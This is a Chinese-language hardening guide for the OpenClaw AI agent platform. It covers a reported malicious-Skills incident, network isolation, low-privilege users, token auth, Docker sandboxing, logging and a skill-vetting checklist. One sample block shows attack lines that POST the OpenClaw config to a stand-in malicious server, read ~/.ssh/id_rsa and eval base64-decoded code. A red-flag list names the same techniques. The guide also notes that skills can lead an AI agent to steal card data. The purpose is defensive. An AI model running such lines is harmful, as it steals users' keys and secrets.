OpenClaw 安全风险与加固指南

主要安全风险

从公开信息及工信部预警来看，OpenClaw 的风险点主要集中在以下几类：

真实漏洞案例警示

2026年3月，OpenClaw社区爆发大规模安全事件，造成严重损失：

• • 恶意 Skills 数量：1,892个恶意Skills潜伏在ClawHub
• • 攻击包数量：945个攻击包伪装成正常工具
• • 受害者损失：SSH密钥、加密钱包、浏览器密码、企业内部数据被窃取
• • 攻击者获利：超过 $3.7M（约2600万人民币）

常见恶意 Skills 伪装：

• • ❌ "SEO优化大师" → 偷取API密钥
• • ❌ "数据分析助手" → 读取服务器密钥
• • ❌ "自动化脚本" → 发送数据到外部服务器

攻击代码示例：

// 偷取OpenClaw配置
curl -X POSThttps://恶意服务器.com/steal \
  -d "$(cat ~/.openclaw/openclaw.json)"

// 读取SSH密钥
const sshKey = fs.readFileSync('~/.ssh/id_rsa')

// 执行恶意代码
eval(base64.decode('恶意代码'))

一个恶意Skill可能导致全部资产归零，必须高度警惕。

公网暴露风险

• • OpenClaw 默认监听公网 IP（0.0.0.0）
• • 超过 35 万个实例因公网暴露已被列入高危清单
• • 成为黑客扫描和攻击的直接目标

权限过大风险

• • 默认拥有执行系统命令的能力
• • 若以 root 身份运行，一旦失控将造成毁灭性后果
• • exec/browser/file 等高危工具对低信任输入开放

访问认证缺失

• • 默认配置可能无密码访问
• • 缺少设备白名单机制
• • 未启用 JWT Token 认证

凭证管理混乱

• • API Key、Webhook、账号密钥明文散落
• • 配置文件中硬编码敏感信息
• • 缺少密钥定期轮换机制

缺少审计追踪

• • 无法回放"谁执行了什么"
• • 关键操作没有留痕
• • 缺少异常行为告警
• 

安全加固详细步骤

网络隔离：关闭公网暴露

这是最重要的一步，可阻断 90% 的黑客攻击。

操作步骤 1：修改监听地址为本地回环

命令行方式：

openclaw config set server.host 127.0.0.1

配置文件方式（Windows）：

1. 1. 找到 OpenClaw 安装文件夹（通常在 C:\Users\你的用户名\AppData\Local\OpenClaw）
2. 2. 找到 config.json 或 .env 文件，用记事本打开
3. 3. 找到以下行：

   "host":"0.0.0.0"

   改为：

   "host":"127.0.0.1"

4. 4. 保存文件，重启 OpenClaw

验证： 打开浏览器输入 http://你的公网IP:18789，如果无法访问，则配置成功。

操作步骤 2：如需远程访问，使用加密隧道

推荐方案： Tailscale 或 Cloudflare Tunnel

Tailscale 示例：

tailscale up --advertise-exit-node

Cloudflare Tunnel 示例：

cloudflared tunnel --url http://localhost:18789

注意：避免使用 Funnel 模式，选择 Serve 模式建立点对点加密连接。

操作步骤 3：云服务器安全组配置

1. 1. 登录阿里云/腾讯云控制台
2. 2. 进入轻量应用服务器 → 安全组
3. 3. 禁止放行 18789 端口给 0.0.0.0/0
4. 4. 仅对可信 IP 白名单开放，或通过反向代理访问

权限控制：创建低权限用户

操作步骤 1：创建专用低权限用户

useradd -m openclaw-user
passwd openclaw-user

操作步骤 2：授予必要权限（仅限 Docker 操作）

usermod -aG docker openclaw-user

操作步骤 3：切换用户并重启服务

su - openclaw-user
docker run -d \
  --name openclaw-lowpriv \
  -p 18789:18789 \
  -v /home/openclaw-user/openclaw/config:/app/config \
  --privileged=false \
  openclaw/runtime:v2026.3

关键配置说明：

• • --privileged=false：禁用特权模式，防止容器逃逸
• • 使用非 root 用户运行服务

访问安全：启用强认证

操作步骤 1：启用 JWT Token 认证

openclaw auth create-token

保存生成的 token，用于客户端登录。

操作步骤 2：配置 Gateway 密码保护

在 gateway.config.json 中设置：

{
"auth":{
"enabled":true,
"strategy":"token",
"token":"your-generated-long-token"
}
}

密码设置原则：

• • 使用 16 位以上随机字符串
• • 避免弱口令（admin、123456 等）
• • 建议格式：单词 + 数字 + 符号，至少 12 位

操作步骤 3：设备白名单（Allowlist）模式

启用新设备接入审批机制，防止非法终端接入。

操作步骤 4：RBAC 角色控制

OpenClaw 内置 RBAC 权限体系，支持三种角色：

• • 管理员：可改配置、看日志
• • 编辑者：可创建/修改任务
• • 只读访客：仅能查看，适合外部协作

沙箱隔离：Docker 容器化运行

操作步骤 1：配置 docker-compose.yml 实现最小权限

version:'3.8'
services:
openclaw:
image:openclaw/runtime:v2026.3
container_name:openclaw_sandbox
volumes:
-./workspace:/app/workspace:ro# 只读挂载
cap_drop:
-ALL# 剥离所有系统特权
networks:
-isolated_net

networks:
isolated_net:
driver:bridge
internal:true# 禁止外网连接

关键配置说明：

• • :ro：只读挂载工作区目录
• • cap_drop: ALL：剥离所有系统特权
• • internal: true：禁止外网连接

操作步骤 2：挂载目录权限控制

• • 所有工作区目录应以 :ro（只读）方式挂载
• • 禁止挂载根目录 / 或用户主目录全量映射

日志与审计：开启详细记录

操作步骤 1：启用 OpenClaw 详细日志

openclaw config set logging.level debug

操作步骤 2：定期检查日志文件

tail -f ~/.openclaw/logs/app.log
grep "error\|delete\|rm" ~/.openclaw/logs/app.log

操作步骤 3：配置异常告警机制

当检测到"异地登录"、"批量删除"等行为时，自动发送通知至邮箱或 Telegram。

可结合脚本实现熔断机制：

if [ $(grep -c "rm -rf"log) > 5 ]; then
  docker stop openclaw;
fi

个人用户快速加固指南

第一步：检查你的 OpenClaw 是否"裸奔"（1分钟）

快速自检：
打开浏览器，输入 http://你的IP地址:18789

• • 如果出现 OpenClaw 的登录界面 → 危险！你已被暴露
• • 如果显示"无法访问" → 暂时安全

查 IP 方式： 百度搜"IP"，第一个结果就是。

第二步：立即关闭"公网大门"（2分钟）

参考 网络隔离：关闭公网暴露 章节。

懒人版：如果找不到配置文件，直接卸载重装，安装时遇到"允许网络访问"的选项，一律选"否"或"仅本地"。

第三步：设置"防盗门"——强密码（1分钟）

1. 1. 打开 OpenClaw 的 Web 界面（浏览器输入 127.0.0.1:18789）
2. 2. 找到"设置" → "安全" → "修改密码"
3. 3. 开启"每次启动都需要密码"选项

第四步：给 OpenClaw 戴"手铐"——限制权限（1分钟）

必须关闭的权限：

第五步：定期"体检"——安全检查清单（30秒）

每周花 30 秒，确认以下事项：

• • OpenClaw 版本是否为最新？（旧版本有漏洞）
• • 最近有没有安装来路不明的"技能"（Skill）？
• • 电脑有没有变慢/发热/异常风扇声？（可能被挖矿）
• • 浏览器有没有弹出奇怪的广告？（可能被劫持）

紧急情况处理

如果你怀疑已经被黑客入侵：

1. 1. 立即断网（拔掉网线或关闭 WiFi）
2. 2. 结束 OpenClaw 进程（Ctrl+Alt+Delete 打开任务管理器，找到 OpenClaw 相关进程，右键"结束任务"）
3. 3. 修改所有重要账户密码（邮箱、网银、社交账号）
4. 4. 卸载 OpenClaw，重新安装时严格按本文步骤配置
5. 5. 全盘杀毒，检查是否有后门程序

安全配置模板

最高安全配置 config.yaml

# OpenClaw 最高安全配置（禁止远程、禁止外网、仅本地、强限制）
listen_host:127.0.0.1
listen_port:18789

auth:
enabled:true
strategy:token
token:"your-generated-long-token-here-min-16-chars"

logging:
level:debug
file:~/.openclaw/logs/app.log

security:
allow_remote_access:false
enable_device_whitelist:true
max_login_attempts:5
auto_lockout_minutes:30

permissions:
allow_exec:false
allow_browser:false
allow_file_write:false
allow_network_access:false

附加安全建议

技能安全审核工具：skill-vetter

skill-vetter 是你的 OpenClaw 安全守门员，安装任何 Skill 前必须先过它这关。

安装方法：

clawhub install skill-vetter

4步安全审核流程：

第1步：来源检查

• • 作者是谁？可信吗？
• • 下载量多少？
• • GitHub Stars 多少？
• • 最近更新吗？
• • 社区评价如何？

第2步：代码审查（最重要）
检查20+危险信号，看到就警惕：

• • 🚨 curl 到未知 URL
• • 🚨 读取 ~/.ssh, ~/.aws（服务器密钥）
• • 🚨 访问 MEMORY.md/USER.md（记忆文件）
• • 🚨 eval() 执行外部代码
• • 🚨 base64 解码运行（隐藏恶意代码）
• • 🚨 混淆/压缩/编码的代码（看不清做什么）

第3步：权限评估

• • 要读哪些文件？
• • 要访问哪些网站？
• • 要执行什么命令？

第4步：风险分级

• • 🟢 LOW → 直接装（如：笔记整理、天气查询）
• • 🟡 MEDIUM → 仔细看代码（如：浏览器控制）
• • 🔴 HIGH → 找大佬确认（如：交易操作）
• • ⛔ EXTREME → 千万别装（如：要求 root 权限）

安全安装流程：

1. 1. 看到想装的 Skill
2. 2. 先用 skill-vetter 审核
3. 3. 检查4步流程
4. 4. 判断风险等级
5. 5. 按风险等级决定是否安装

已审核的 Safe Skills 推荐：

🟢 LOW 风险（放心装）：

• • skill-vetter（安全审核）- 必须先装！
• • tavily-search（AI搜索）- 免费好用
• • summarize（内容总结）- 读长文神器
• • humanizer（文本优化）- 去AI痕迹

🟡 MEDIUM 风险（需确认）：

• • agent-browser（浏览器控制）
• • playwright-scraper（爬虫）
• • feishu-doc（飞书文档操作）

⛔ EXTREME 风险（千万别装）：

• • 任何要求 root 权限的
• • 任何读取 ~/.ssh 的
• • 任何发送数据到外部的
• • 任何混淆代码看不清的

特别警示

⚠️ 不要随意安装 buy-anything、auto-shell 类高危技能，已有案例显示其可诱导 AI 窃取信用卡信息。

一句话总结

"本地运行 + 强密码 + 少给权限 + 不装来路不明的插件"

做到这四点，你的 OpenClaw 就比 90% 的用户安全。

OpenClaw 是个强大的工具，但工具越强大，用错代价越大。花 5 分钟做安全设置，换来的是安心使用。